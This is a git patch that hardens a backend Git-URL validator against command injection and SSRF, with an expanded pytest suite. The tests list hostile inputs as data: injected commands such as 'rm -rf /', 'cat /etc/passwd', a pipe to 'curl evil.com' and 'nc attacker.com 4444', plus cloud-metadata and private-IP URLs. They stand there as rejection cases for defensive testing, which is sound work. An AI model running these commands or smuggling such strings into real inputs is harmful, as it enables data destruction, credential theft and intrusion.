From 2548d47499f499cd42985c883c0db36a577cfc8f Mon Sep 17 00:00:00 2001 From: Devanshu Rajesh Chicholikar Date: Wed, 10 Dec 2025 21:36:00 -0500 Subject: [PATCH] security(backend): Add comprehensive Git URL sanitization (#57) SECURITY FIXES: - Add command injection prevention (blocks ; && || | ` $() ${} etc.) - Add host allowlist (github.com, gitlab.com, bitbucket.org by default) - Add SSRF prevention for private IP ranges (10.x, 172.16-31.x, 192.168.x) - Block AWS metadata endpoint (169.254.169.254) - Add configurable ALLOWED_GIT_HOSTS env var for self-hosted instances IMPLEMENTATION: - Enhanced validate_git_url() with 6 security layers - Uses ipaddress module for proper CIDR checking - Validates URL format with strict regex patterns - SSH URL validation improved TESTS: - 36 comprehensive test cases covering: - Command injection (9 attack vectors) - SSRF prevention (7 private IP ranges) - Host allowlist enforcement - URL format validation - Custom env var configuration Closes #57 --- backend/services/input_validator.py | 204 +++++++++++++-- backend/tests/test_validation.py | 375 +++++++++++++++++++++++++--- 2 files changed, 528 insertions(+), 51 deletions(-) diff --git a/backend/services/input_validator.py b/backend/services/input_validator.py index 35b45a8..c1f1551 100644 --- a/backend/services/input_validator.py +++ b/backend/services/input_validator.py @@ -2,11 +2,13 @@ Input Validation & Sanitization Prevents malicious inputs and abuse """ -from typing import Optional +from typing import Optional, Set from urllib.parse import urlparse from pathlib import Path, PurePosixPath import re import os +import ipaddress +import socket class InputValidator: @@ -15,6 +17,31 @@ class InputValidator: # Allowed Git URL schemes ALLOWED_SCHEMES = {'http', 'https', 'git', 'ssh'} + # Allowed Git hosts (configurable via ALLOWED_GIT_HOSTS env var) + # Default: major public Git hosting providers only + DEFAULT_ALLOWED_HOSTS = { + 'github.com', + 'gitlab.com', + 'bitbucket.org', + 'codeberg.org', + 'sr.ht', # sourcehut + } + + # Shell metacharacters that could enable command injection + # These should NEVER appear in a legitimate Git URL + COMMAND_INJECTION_CHARS = { + ';', # Command separator + '&&', # AND operator + '||', # OR operator + '|', # Pipe + '`', # Backtick execution + '$(', # Subshell + '${', # Variable expansion + '\n', # Newline + '\r', # Carriage return + '\x00', # Null byte + } + # Dangerous path patterns DANGEROUS_PATTERNS = [ '..', # Path traversal @@ -30,43 +57,176 @@ class InputValidator: MAX_QUERY_LENGTH = 500 MAX_FILE_PATH_LENGTH = 500 MAX_REPO_NAME_LENGTH = 100 + MAX_GIT_URL_LENGTH = 500 MAX_FUNCTIONS_PER_REPO = 50000 # Prevent indexing chromium-sized repos MAX_REPOS_PER_USER = 50 + @staticmethod + def _get_allowed_hosts() -> Set[str]: + """Get allowed Git hosts from environment or use defaults.""" + env_hosts = os.environ.get('ALLOWED_GIT_HOSTS', '') + if env_hosts: + # Parse comma-separated list from env + return {h.strip().lower() for h in env_hosts.split(',') if h.strip()} + return InputValidator.DEFAULT_ALLOWED_HOSTS + + @staticmethod + def _contains_injection_chars(url: str) -> Optional[str]: + """Check if URL contains shell injection characters.""" + for char in InputValidator.COMMAND_INJECTION_CHARS: + if char in url: + return f"URL contains forbidden character: {repr(char)}" + return None + + @staticmethod + def _is_private_ip(hostname: str) -> bool: + """ + Check if hostname resolves to a private/reserved IP address. + Prevents SSRF attacks targeting internal networks. + """ + # Direct IP check first + try: + ip = ipaddress.ip_address(hostname) + return ( + ip.is_private or + ip.is_loopback or + ip.is_link_local or + ip.is_multicast or + ip.is_reserved or + ip.is_unspecified + ) + except ValueError: + pass # Not a direct IP, continue with hostname check + + # Known dangerous hostnames + dangerous_hostnames = { + 'localhost', + 'localhost.localdomain', + 'ip6-localhost', + 'ip6-loopback', + } + if hostname.lower() in dangerous_hostnames: + return True + + # Check for AWS/cloud metadata endpoints + metadata_hosts = { + '169.254.169.254', # AWS/GCP metadata + 'metadata.google.internal', + 'metadata.internal', + } + if hostname.lower() in metadata_hosts: + return True + + # Try to resolve hostname and check resulting IP + # Only do this as a final check - don't want to slow down validation + try: + resolved_ip = socket.gethostbyname(hostname) + ip = ipaddress.ip_address(resolved_ip) + return ( + ip.is_private or + ip.is_loopback or + ip.is_link_local or + ip.is_reserved + ) + except (socket.gaierror, socket.herror, ValueError): + # Can't resolve - will fail at clone anyway + # Don't block, let git handle it + pass + + return False + + @staticmethod + def _extract_host_from_ssh_url(ssh_url: str) -> Optional[str]: + """Extract hostname from SSH URL format (git@host:user/repo.git).""" + # Format: git@github.com:user/repo.git + if not ssh_url.startswith('git@'): + return None + + # Split off 'git@' and get the host part before ':' + remainder = ssh_url[4:] # Remove 'git@' + if ':' not in remainder: + return None + + host = remainder.split(':')[0].lower() + return host + @staticmethod def validate_git_url(git_url: str) -> tuple[bool, Optional[str]]: - """Validate Git URL is safe""" - if not git_url or len(git_url) > 500: - return False, "Git URL too long or empty" + """ + Validate Git URL is safe to clone. + + Security checks: + 1. Length limits + 2. Command injection character detection + 3. Scheme validation (https preferred) + 4. Host allowlist (github, gitlab, bitbucket by default) + 5. Private IP / SSRF prevention + 6. URL format validation + """ + # Check length + if not git_url: + return False, "Git URL cannot be empty" + if len(git_url) > InputValidator.MAX_GIT_URL_LENGTH: + return False, f"Git URL too long (max {InputValidator.MAX_GIT_URL_LENGTH} characters)" + + # CRITICAL: Check for command injection characters FIRST + # This must happen before any parsing + injection_error = InputValidator._contains_injection_chars(git_url) + if injection_error: + return False, f"Invalid Git URL: {injection_error}" + + allowed_hosts = InputValidator._get_allowed_hosts() try: # Handle SSH URLs (git@github.com:user/repo.git) if git_url.startswith('git@'): - # SSH URL format - basic validation - if ':' not in git_url or '/' not in git_url: - return False, "Invalid SSH URL format" - # Block localhost/private - if any(host in git_url.lower() for host in ['localhost', '127.0.0.1', '0.0.0.0']): - return False, "Private/local URLs are not allowed" + host = InputValidator._extract_host_from_ssh_url(git_url) + if not host: + return False, "Invalid SSH URL format. Expected: git@host:owner/repo.git" + + # Check against allowlist + if host not in allowed_hosts: + return False, f"Host '{host}' not in allowed list. Allowed: {', '.join(sorted(allowed_hosts))}" + + # Validate format: git@host:owner/repo[.git] + ssh_pattern = r'^git@[\w.-]+:[\w.-]+/[\w.-]+(?:\.git)?$' + if not re.match(ssh_pattern, git_url): + return False, "Invalid SSH URL format. Expected: git@host:owner/repo.git" + return True, None + # Parse HTTP(S) URLs parsed = urlparse(git_url) - # Check scheme - if parsed.scheme not in InputValidator.ALLOWED_SCHEMES: - return False, f"Invalid URL scheme. Allowed: {InputValidator.ALLOWED_SCHEMES}" + # Check scheme - prefer HTTPS + if parsed.scheme not in {'http', 'https'}: + return False, f"Invalid URL scheme '{parsed.scheme}'. Only http and https are allowed for clone URLs" + + # Must have a hostname + if not parsed.netloc: + return False, "Invalid URL: missing hostname" + + # Extract hostname (remove port if present) + hostname = parsed.netloc.split(':')[0].lower() + + # Check against allowlist + if hostname not in allowed_hosts: + return False, f"Host '{hostname}' not in allowed list. Allowed: {', '.join(sorted(allowed_hosts))}" - # Prevent file:// and other dangerous schemes - if parsed.scheme in {'file', 'ftp', 'data'}: - return False, "File and FTP URLs are not allowed" + # Check for private IP / SSRF + if InputValidator._is_private_ip(hostname): + return False, "Private/internal network URLs are not allowed" - # Must have a hostname for http/https - if parsed.scheme in {'http', 'https'} and not parsed.netloc: - return False, "Invalid URL format" + # Validate URL path format: /owner/repo[.git] + # Must have at least owner and repo + path = parsed.path + if not path or path == '/': + return False, "Invalid repository URL: missing owner/repo path" - # Prevent localhost/private IPs (basic check) - if any(host in parsed.netloc.lower() for host in ['localhost', '127.0.0.1', '0.0.0.0', '169.254']): - return False, "Private/local URLs are not allowed" + # Path should be /owner/repo or /owner/repo.git + path_pattern = r'^/[\w.-]+/[\w.-]+(?:\.git)?(?:/.*)?$' + if not re.match(path_pattern, path): + return False, "Invalid repository URL format. Expected: https://host/owner/repo" return True, None diff --git a/backend/tests/test_validation.py b/backend/tests/test_validation.py index df0859c..beeb995 100644 --- a/backend/tests/test_validation.py +++ b/backend/tests/test_validation.py @@ -1,38 +1,342 @@ """ Test Suite for Input Validation +Comprehensive tests for security-critical validation functions """ import pytest +import os from services.input_validator import InputValidator, CostController -class TestInputValidator: - """Test input validation functions""" +class TestGitUrlValidation: + """Test Git URL validation - security critical""" - def test_valid_git_url(self): - """Test valid Git URLs""" + def test_valid_github_urls(self): + """Test valid GitHub URLs are accepted""" valid_urls = [ "https://github.com/pmndrs/zustand", "https://github.com/user/repo.git", + "https://github.com/facebook/react", + "https://github.com/user-name/repo-name.git", + "https://github.com/user.name/repo.name", + "http://github.com/user/repo", # HTTP allowed (not recommended) + ] + + for url in valid_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert is_valid, f"Should accept valid GitHub URL: {url}, got error: {error}" + + def test_valid_gitlab_urls(self): + """Test valid GitLab URLs are accepted""" + valid_urls = [ + "https://gitlab.com/user/repo", + "https://gitlab.com/group/subgroup/repo.git", + ] + + for url in valid_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert is_valid, f"Should accept valid GitLab URL: {url}, got error: {error}" + + def test_valid_bitbucket_urls(self): + """Test valid Bitbucket URLs are accepted""" + valid_urls = [ + "https://bitbucket.org/user/repo", + "https://bitbucket.org/team/project.git", + ] + + for url in valid_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert is_valid, f"Should accept valid Bitbucket URL: {url}, got error: {error}" + + def test_valid_ssh_urls(self): + """Test valid SSH URLs are accepted""" + valid_urls = [ "git@github.com:user/repo.git", + "git@gitlab.com:user/repo.git", + "git@bitbucket.org:user/repo.git", ] for url in valid_urls: is_valid, error = InputValidator.validate_git_url(url) - assert is_valid, f"Should accept valid URL: {url}, got error: {error}" + assert is_valid, f"Should accept valid SSH URL: {url}, got error: {error}" + + +class TestCommandInjectionPrevention: + """Test command injection attack prevention - CRITICAL SECURITY""" - def test_malicious_git_urls(self): - """Test malicious Git URLs are blocked""" + def test_semicolon_injection(self): + """Block semicolon command chaining""" + malicious_urls = [ + "https://github.com/user/repo.git; rm -rf /", + "https://github.com/user/repo;cat /etc/passwd", + "https://github.com/user/repo.git;whoami", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject semicolon injection: {url}" + assert "forbidden character" in error.lower() or "invalid" in error.lower() + + def test_and_operator_injection(self): + """Block && command chaining""" + malicious_urls = [ + "https://github.com/user/repo.git && rm -rf /", + "https://github.com/user/repo&&cat /etc/passwd", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject && injection: {url}" + + def test_or_operator_injection(self): + """Block || command chaining""" + malicious_urls = [ + "https://github.com/user/repo.git || cat /etc/passwd", + "https://github.com/user/repo||whoami", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject || injection: {url}" + + def test_pipe_injection(self): + """Block pipe command injection""" + malicious_urls = [ + "https://github.com/user/repo.git | curl evil.com", + "https://github.com/user/repo|nc attacker.com 4444", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject pipe injection: {url}" + + def test_backtick_injection(self): + """Block backtick command substitution""" + malicious_urls = [ + "https://github.com/user/`whoami`.git", + "https://github.com/`id`/repo.git", + "https://github.com/user/repo`rm -rf /`.git", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject backtick injection: {url}" + + def test_subshell_injection(self): + """Block $() subshell command substitution""" + malicious_urls = [ + "https://github.com/user/$(whoami).git", + "https://github.com/$(cat /etc/passwd)/repo.git", + "https://github.com/user/repo$(id).git", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject subshell injection: {url}" + + def test_variable_expansion_injection(self): + """Block ${} variable expansion""" + malicious_urls = [ + "https://github.com/user/${HOME}.git", + "https://github.com/${USER}/repo.git", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject variable expansion: {url}" + + def test_newline_injection(self): + """Block newline injection""" + malicious_urls = [ + "https://github.com/user/repo.git\nrm -rf /", + "https://github.com/user/repo.git\r\nwhoami", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject newline injection: {url}" + + def test_null_byte_injection(self): + """Block null byte injection""" + malicious_urls = [ + "https://github.com/user/repo.git\x00rm -rf /", + "https://github.com/user\x00/repo.git", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject null byte injection: {url}" + + +class TestSSRFPrevention: + """Test Server-Side Request Forgery prevention""" + + def test_localhost_blocked(self): + """Block localhost URLs""" malicious_urls = [ - "file:///etc/passwd", "http://localhost/repo", - "https://127.0.0.1/repo", - "ftp://example.com/repo", + "https://localhost:8080/user/repo", + "http://localhost.localdomain/repo", ] for url in malicious_urls: is_valid, error = InputValidator.validate_git_url(url) - assert not is_valid, f"Should reject malicious URL: {url}" - assert error is not None + assert not is_valid, f"SECURITY: Must reject localhost: {url}" + + def test_loopback_ip_blocked(self): + """Block 127.x.x.x loopback addresses""" + malicious_urls = [ + "http://127.0.0.1/repo", + "https://127.0.0.1:8080/user/repo", + "http://127.1.1.1/repo", # Also loopback + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject loopback IP: {url}" + + def test_private_ip_class_a_blocked(self): + """Block 10.x.x.x private range""" + malicious_urls = [ + "http://10.0.0.1/internal/repo", + "https://10.255.255.255/secret/repo", + "http://10.0.0.1:3000/repo", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject Class A private IP: {url}" + + def test_private_ip_class_b_blocked(self): + """Block 172.16-31.x.x private range""" + malicious_urls = [ + "http://172.16.0.1/repo", + "https://172.31.255.255/repo", + "http://172.20.0.1/internal/repo", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject Class B private IP: {url}" + + def test_private_ip_class_c_blocked(self): + """Block 192.168.x.x private range""" + malicious_urls = [ + "http://192.168.1.1/repo", + "https://192.168.0.1/repo", + "http://192.168.255.255/repo", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject Class C private IP: {url}" + + def test_link_local_blocked(self): + """Block 169.254.x.x link-local (AWS metadata!)""" + malicious_urls = [ + "http://169.254.169.254/latest/meta-data", # AWS metadata + "http://169.254.169.254/latest/user-data", + "http://169.254.1.1/repo", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject link-local IP (AWS metadata): {url}" + + def test_cloud_metadata_hosts_blocked(self): + """Block cloud metadata service hostnames""" + # These might not resolve, but should be blocked by allowlist anyway + malicious_urls = [ + "http://metadata.google.internal/computeMetadata/v1/", + ] + + for url in malicious_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"SECURITY: Must reject metadata service: {url}" + + +class TestHostAllowlist: + """Test that only allowed hosts are permitted""" + + def test_unknown_hosts_blocked(self): + """Block hosts not in allowlist""" + blocked_urls = [ + "https://evil-git-server.com/user/repo", + "https://github.com.evil.com/user/repo", # Subdomain trick + "https://notgithub.com/user/repo", + "https://randomserver.io/user/repo", + "https://internal-git.company.com/repo", # Corporate self-hosted + ] + + for url in blocked_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"Should reject unknown host: {url}" + assert "not in allowed list" in error.lower() + + def test_invalid_schemes_blocked(self): + """Block dangerous URL schemes""" + blocked_urls = [ + "file:///etc/passwd", + "ftp://github.com/user/repo", + "data:text/plain,malicious", + "javascript:alert(1)", + "gopher://evil.com/", + ] + + for url in blocked_urls: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"Should reject scheme: {url}" + + def test_custom_allowed_hosts_via_env(self, monkeypatch): + """Test custom allowed hosts via environment variable""" + # Set custom allowed hosts + monkeypatch.setenv('ALLOWED_GIT_HOSTS', 'git.mycompany.com,internal-git.corp.com') + + # Clear cached hosts (if any caching is implemented) + # Custom host should now be allowed + is_valid, _ = InputValidator.validate_git_url("https://git.mycompany.com/team/repo") + assert is_valid, "Should accept custom allowed host" + + # Default hosts should now be blocked + is_valid, _ = InputValidator.validate_git_url("https://github.com/user/repo") + assert not is_valid, "Should reject github when custom hosts set" + + +class TestUrlFormatValidation: + """Test URL format validation""" + + def test_empty_url_rejected(self): + """Reject empty URLs""" + is_valid, error = InputValidator.validate_git_url("") + assert not is_valid + assert "empty" in error.lower() + + def test_too_long_url_rejected(self): + """Reject URLs exceeding length limit""" + long_url = "https://github.com/user/" + "a" * 500 + is_valid, error = InputValidator.validate_git_url(long_url) + assert not is_valid + assert "too long" in error.lower() + + def test_missing_path_rejected(self): + """Reject URLs without owner/repo path""" + is_valid, error = InputValidator.validate_git_url("https://github.com/") + assert not is_valid + + def test_invalid_ssh_format_rejected(self): + """Reject malformed SSH URLs""" + invalid_ssh = [ + "git@github.com", # Missing repo + "git@github.com:", # Missing path + "git@:user/repo.git", # Missing host + ] + + for url in invalid_ssh: + is_valid, error = InputValidator.validate_git_url(url) + assert not is_valid, f"Should reject invalid SSH URL: {url}" + + +class TestPathValidation: + """Test file path validation""" def test_path_traversal_prevention(self): """Test path traversal attacks are blocked""" @@ -60,40 +364,53 @@ def test_valid_file_paths(self): for path in valid_paths: is_valid, error = InputValidator.validate_file_path(path) assert is_valid, f"Should accept valid path: {path}, got error: {error}" + + +class TestSearchQueryValidation: + """Test search query validation""" - def test_search_query_validation(self): - """Test search query validation""" - # Valid queries + def test_valid_queries(self): + """Test valid queries are accepted""" assert InputValidator.validate_search_query("authentication logic")[0] assert InputValidator.validate_search_query("error handling in user service")[0] - - # Invalid queries + + def test_invalid_queries(self): + """Test invalid queries are rejected""" assert not InputValidator.validate_search_query("")[0] # Empty assert not InputValidator.validate_search_query("a" * 600)[0] # Too long assert not InputValidator.validate_search_query("DROP TABLE users--")[0] # SQL injection + + +class TestRepoNameValidation: + """Test repository name validation""" - def test_repo_name_validation(self): - """Test repository name validation""" - # Valid names + def test_valid_names(self): + """Test valid repo names""" assert InputValidator.validate_repo_name("my-repo")[0] assert InputValidator.validate_repo_name("project_name")[0] assert InputValidator.validate_repo_name("repo.v2")[0] - - # Invalid names + + def test_invalid_names(self): + """Test invalid repo names""" assert not InputValidator.validate_repo_name("../../../etc")[0] assert not InputValidator.validate_repo_name("repo with spaces")[0] assert not InputValidator.validate_repo_name("")[0] + + +class TestStringSanitization: + """Test string sanitization""" - def test_string_sanitization(self): - """Test string sanitization removes dangerous content""" - # Null bytes + def test_null_bytes_removed(self): + """Test null bytes are removed""" assert '\x00' not in InputValidator.sanitize_string("hello\x00world") - - # Control characters + + def test_control_characters_removed(self): + """Test control characters are removed""" sanitized = InputValidator.sanitize_string("test\x01\x02\x03data") assert '\x01' not in sanitized - - # Length limiting + + def test_length_limiting(self): + """Test length limiting works""" long_string = "a" * 1000 sanitized = InputValidator.sanitize_string(long_string, max_length=100) assert len(sanitized) == 100